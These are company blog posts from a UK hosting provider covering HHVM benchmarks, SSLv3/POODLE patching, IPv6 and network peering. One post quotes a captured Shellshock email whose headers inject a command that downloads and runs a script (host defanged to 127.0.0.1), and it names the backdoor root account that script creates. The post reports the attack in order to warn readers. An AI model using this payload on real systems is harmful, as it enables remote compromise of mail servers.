HipHop and WordPress: If you’re tired of tea then you’re tired of life…

November 14th, 2014

HipHop is not only a style of music, but also the name of a virtual machine written by Facebook which compiles PHP just in time to make it go quickly.

Now, we receive lots of unsolicited advice about how to run a not-very-popular WordPress blog and cope with the volume of traffic. Usually this involves ripping out and replacing the entire infrastructure, from a standard Linux/Apache/MySQL/PHP stack to something different (Nginx, MariaDB, PostgreSQL) which may not even be able to run WordPress at all (e.g. node.js).

At Mythic Beasts we like to understand what we’re doing, rather than blindly installing Magic Go Faster Solution Number 7. So we set up a test 2GB dual-core virtual machine running WordPress and a selection of popular plugins (WordPress SEO, Akismet, Safe Report Comments, Liveblog, Facebook, Yet Another Related Posts Plugin, WordPress Supercache and Jetpack; no endorsement implied). Then we benchmarked it with siege and got the following results.

Apache/mod_php : 5.10 trans/sec

and when you turn supercache on and serve cached pages you get

Apache/mod_php/supercache : 873.50 trans/sec

So this gives us two scenarios: pages for which we have to generate content, which can easily cause load issues, and pages served from supercache, where our VM is fast enough for all practical purposes and will easily weather even very big traffic spikes from news websites or television adverts.
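As an aside on methodology: siege prints a summary including a “Transaction rate” line, and it’s that figure we compare between configurations. A small sketch of pulling it out of a saved log (the log contents below are illustrative, not a real benchmark run):

```shell
# Create an illustrative siege summary (not real benchmark output).
cat > siege.log <<'EOF'
Transactions:              1747 hits
Availability:            100.00 %
Transaction rate:        873.50 trans/sec
EOF

# Extract the transactions-per-second figure: third whitespace-separated
# field of the matching line.
rate=$(awk '/Transaction rate/ {print $3}' siege.log)
echo "$rate"    # prints 873.50
```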

Now, it’s very popular to tell us to use Nginx as it’s faster than Apache. Is it though?

Nginx/php-fpm: 5.70 trans/sec
Nginx/php-fpm/supercache: 2230.58 trans/sec

Wow! Nginx is about two and a half times quicker than Apache at serving cached pages. This is impressive, but not very helpful. It means that when our webserver is already serving pages really quickly, it serves them even more quickly, but when we’re generating pages on demand it’s only about 10% quicker. That’s not very special and doesn’t justify a rip-and-replace of the whole installation for a 10% performance improvement.
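Working the ratios out explicitly from the figures above (just arithmetic on the benchmark numbers):

```shell
# Speedup of Nginx over Apache, from the benchmark figures quoted above.
awk 'BEGIN {
    printf "cached:   %.2fx\n", 2230.58 / 873.50  # supercache-served pages
    printf "uncached: %.2fx\n", 5.70 / 5.10       # generated pages
}'
```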

A quick look at the VM during the testing tells us that the bottleneck is executing the PHP code which creates WordPress pages. The choice of webserver is basically irrelevant; almost all the server time is spent executing PHP and reading data from the database.

Enter the HipHop Virtual Machine (HHVM).


This is nothing to do with the HipHop Virtual Machine. But we like tea and Banging Tunes

It has one focus: executing PHP quickly for Facebook. Facebook have a lot of servers and spend hundreds of millions to billions of dollars per year on servers and data centres. A 50% performance improvement in PHP saves them huge sums on data centres and servers alone, so it’s clearly worth them optimising as much as possible.

Here’s what happens with Apache/Nginx running HHVM.

Apache/HHVM :           35.93 trans/sec
Apache/HHVM/supercache: 928.70 trans/sec
Nginx/HHVM :            33.78 trans/sec
Nginx/HHVM/supercache : 2137.67 trans/sec

This is a huge improvement for non-cached pages: seven times faster. Cached pages are bottlenecked in the webserver, so HHVM makes minimal difference there, but they were already so fast we weren’t worried about them. Again, Apache and Nginx are still pretty much the same speed for generated pages, as we’re still dominated by code execution time, but a seven-fold performance improvement is worth seriously considering.
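For the curious, wiring a webserver to HHVM is plain FastCGI proxying. A minimal nginx sketch, assuming HHVM is running in FastCGI server mode on 127.0.0.1 port 9000 (the paths and port here are illustrative, not our production config):

```nginx
# /etc/nginx/sites-enabled/wordpress (fragment; paths illustrative)
server {
    listen 80;
    root   /var/www/wordpress;
    index  index.php;

    location ~ \.php$ {
        fastcgi_pass   127.0.0.1:9000;   # HHVM in FastCGI server mode
        fastcgi_index  index.php;
        fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include        fastcgi_params;
    }
}
```

The Apache equivalent proxies PHP requests to the same FastCGI socket, which is why the choice of webserver barely changes the generated-page numbers.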

Whilst we can reconfigure servers standing on our heads, we usually don’t.
Photo credit: Mark Dolby, Flickr, CC-BY.

All I need to do now is see if I can find someone with a very busy WordPress site and a million complaining users who would like to test it to see if it’s really as good as the lab tests suggest it might be.


Very sorry to hear the news that Big Bank Hank, who co-wrote the first ever hit rap track, Rapper’s Delight, died earlier this week from kidney complications related to cancer.


You see, he was six foot one, and he was tons of fun

Difficult customers

November 4th, 2014

At Mythic Beasts we try very hard to keep our customers happy, and to do our absolute best to meet their requirements and requests, even if they’re occasionally a little bit unusual.

One of our long-standing customers is refreshing some of their hardware, and we had the following exchange to sort out the details:

customer> The following 8 servers have been decommissioned and now need removing: 

mythic-beasts> We can sort that for you. Do you want to collect the servers or shall we recycle them for you?

customer> The drives can be kept for spares but you can ditch the servers or make a fort out of them or something..

a 1U server fort

Now, it’s not really our field of expertise, but we think we’ve made a reasonable start on building a defensible concentric castle, although we ran out of servers before we could start on the outer curtain wall.

Shellshock by mail

October 28th, 2014

We’ve already written about ShellShock, a vulnerability in bash.

We patched our systems quickly against it because it looked easy to exploit, and there were a great many different paths by which a piece of untrusted user input could arrive at a bash shell. We saw several attacks over the web almost immediately, but now we’ve seen them starting to arrive by email.


To:() { :; }; /bin/sh -c '/bin/sh -c 'cd /tmp ;curl -sO
127.0.0.1/ex.sh;lwp-download http://127.0.0.1/ex.sh;wget
127.0.0.1/ex.sh;fetch 127.0.0.1/ex.sh;sh ex.sh;rm -fr ex.*' &'
&;
References:() { :; }; ...payload...
Cc:() { :; }; ...payload...
Bcc:() { :; }; ...payload...
From:() { :; }; ...payload...
Subject:() { :; }; ...payload...
Date:() { :; }; ...payload...
Message-ID:() { :; }; ...payload...
Comments:() { :; }; ...payload...
Keywords:() { :; }; ...payload...
Resent-Date:() { :; }; ...payload...
Resent-From:() { :; }; ...payload...

I’ve de-fanged the exploit by changing the IP address. The downloaded script adds a root user called inetd with a password of Inetd1!@#, neatly giving a remote shell on any machine it succeeds on. The attacker’s webserver logs will handily hold the IP addresses of all the infected machines. So all you need now is a nasty piece of spamming software to try to send a message through every mail server in the world, and you’ve built a spam network consisting entirely of legitimate mailservers; or, if you’re a government spying agency, the ability to intercept vast quantities of email with ease.

Note: it’s been commented that this only affects you if your mail server is running as root. That’s not true: imagine an email for root@the-mail-server-host which goes into a mail filter that calls out to a shell, not to mention root exploits deposited into logfiles that might later get processed. There are a vast number of subtle ways this could end up in a copy of bash running as root.
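The underlying mechanism is easy to demonstrate safely on your own machine: pre-patch versions of bash imported function definitions from arbitrary environment variables, and executed any trailing commands while doing so. This is the widely circulated check, harmless either way:

```shell
# ShellShock check: a crafted environment variable with a trailing command.
# A vulnerable bash prints "vulnerable" then "ok"; a patched bash prints
# only "ok", because the trailing command is never executed.
env x='() { :;}; echo vulnerable' bash -c 'echo ok'
```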

Poodle and Pound

October 24th, 2014

Earlier this week, we wrote about the POODLE security vulnerability. As a result of this, we’ve been working with our customers to disable SSLv3 support in their SSL/TLS services.

At Mythic Beasts, we use Pound as a load balancer fairly extensively. It’s free, secure, fairly quick and easy to configure. Unfortunately, it didn’t have a configuration option to disable SSLv3.

Image courtesy of SOMMAI at FreeDigitalPhotos.net

One of the advantages of hosting on open source software is that we’re not at the mercy of a vendor for software updates, so we took a patch which adds the ability to disable SSLv3, added it to the standard Debian package and made it available to our managed customers through our private package repository.
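With the patch applied, turning SSLv3 off in Pound is a one-line change in the HTTPS listener. A sketch of the relevant config fragment (directive name as in the patched package; the address and certificate path are illustrative, so check the man page shipped with your build):

```
ListenHTTPS
    Address 0.0.0.0
    Port    443
    Cert    "/etc/ssl/example.pem"
    Disable SSLv3
End
```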

This same package is now in Debian unstable and is working its way into the Debian security and backports repositories. This is made easier because the Debian pound maintainer, Brett Parker, works for Mythic Beasts and wrote the technical details on his blog.

As we have a number of customers using pound on CentOS, we have also created patched versions of the CentOS packages of Pound, and raised a ticket with Fedora to get this into the stable build.

IPv6 support in the UK

October 22nd, 2014

Recently Mythic Beasts went to the first meeting of the UK IPv6 Council, a non-profit group set up to assist in rolling out IPv6 across the UK. There was a rapid exchange of knowledge, ideas and progress between organisations.

We heard from network engineers at BT, BSkyB and Virgin Media, who between them cover well over half of all end users in the UK. BT and Virgin have enough IPv4 addresses not to require rolling out IPv6; BSkyB don’t, and therefore need to implement either IPv6 or Carrier Grade NAT (CGN), and they really don’t like CGN. Virgin are having portions of their address space taken by other parts of the parent company, so may also need IPv6 or CGN; they too don’t like CGN, and already have IPv6 support in all their SuperHubs, even if the functionality is currently disabled. All three companies have IPv6 support in various levels of trial, with internal staff members running dual stack, and all three plan to roll out customer trials in the first part of 2015.

We also heard from the Belgian IPv6 Council about how Belgium’s roll-out reached nearly 30% of all end users having native IPv6: from less than 1% in May 2013, to 16% in May 2014, and 27% now. Once a couple of their large providers started enabling IPv6, the roll-out was very fast. It’s likely the same thing could happen in the UK, with three major providers having significant IPv6 plans within the next 12 months.

As an idea of how quickly things might happen, T-Mobile USA has gone from nowhere to the 10th largest IPv6 deployment with 44% of their network IPv6 enabled within 12 months.

So, at a guess, Mythic Beasts think that IPv6 rollout in the UK by December 2015 will be either less than 1%, about 25%, or roughly 50%. We aren’t sure which, but we think it’s wise to be prepared for every eventuality. To help you with that, we have an IPv6 health checker.

Security issue in bash

September 24th, 2014

We’ve just become aware of a very serious security hole in bash which is potentially remotely exploitable.

https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Whilst we don’t yet have enough details to evaluate the seriousness of this, we’ve already applied the fixes to our administration servers and VPN gateways, and are now rolling out the updates to all affected managed customers. Managed customers should expect an email shortly with further details.

Ticket escalation

September 24th, 2014

Managed server customers receive 24/7 monitoring of their servers as standard: we check that the machines are up, that ssh is running, and that the web-server is delivering the correct content, amongst other checks. In the event a check fails, our staff are alerted via SMS/pager to investigate the issue.

We’ve now enhanced this service for managed server customers: in the unlikely event that you have a service-affecting issue the automated monitoring hasn’t caught, you can file an urgent ticket through our control panel, which will create a new support ticket and alert our staff via SMS to deal with your issue.

This was a feature request from a customer in a meeting last Thursday, and it went into production as a service enhancement on Tuesday; we’re always receptive to suggestions from customers to make our offering better.

bzip2

September 15th, 2014

bzip2 is one of the great Unix tools. It compresses and decompresses data, and it does it very well. We’ve been using it within Mythic Beasts for years and it’s operated absolutely flawlessly.

We’re happy to report that we’re now hosting the main distribution site for bzip2.
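Day-to-day use is about as simple as tools get; a quick round trip (filenames illustrative):

```shell
# Compress a file, keeping the original (-k), then decompress to a new
# file and confirm the contents survived the round trip.
printf 'hello, bzip2\n' > demo.txt
bzip2 -k demo.txt                        # produces demo.txt.bz2
bzip2 -dc demo.txt.bz2 > roundtrip.txt   # -d decompress, -c to stdout
cmp demo.txt roundtrip.txt && echo 'round trip OK'
```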

Ice Bucket

September 1st, 2014

Thanks to Jonathan Wright, who runs a very big website, for the nomination.

I’ve nominated Matt Smith, Rob McQueen and Neil McGovern.

Thanks to Ben Howe, our gap year student, who adequately demonstrated to his colleagues the definition of a career-limiting move by dunking a bucket of ice over his boss; to The Haymakers for kindly providing the location for the company meeting, the chilled water and the ice; and to the rest of my Mythic Beasts colleagues for filming and laughing.

Depending on nowhere by peering with everyone everywhere

August 29th, 2014

We’ve been adding some more peering sessions to improve our network redundancy. We already had direct peering with every significant UK ISP; we’ve now enhanced this so that one peering session terminates at one of the Telehouse sites and the second at one of the Telecity or Equinix sites. Each peering session is on a different London Internet Exchange (LINX) network; these are physically separate from each other, and where possible we’ve preferred peering sessions that remain within a single building.

We have equal capacity on both networks at LINX, so unlike many ISPs with a single peering port or unequal capacity, in the event of a severe failure (e.g. a whole network or data centre) we just automatically migrate our traffic to our other peering link, rather than falling back to burst bandwidth with our transit providers. We feel that’s a risky strategy because failures are likely to be correlated: lots of ISPs will fall back to transit at the same time in a badly planned and uncoordinated fashion, which could cause a huge traffic spike upstream.

We light our own fibre ring around our core Docklands data centres, and have full transit and peering at both of our core POPs, with dual routers in each, and can offer full or partial transit at any of our data centres.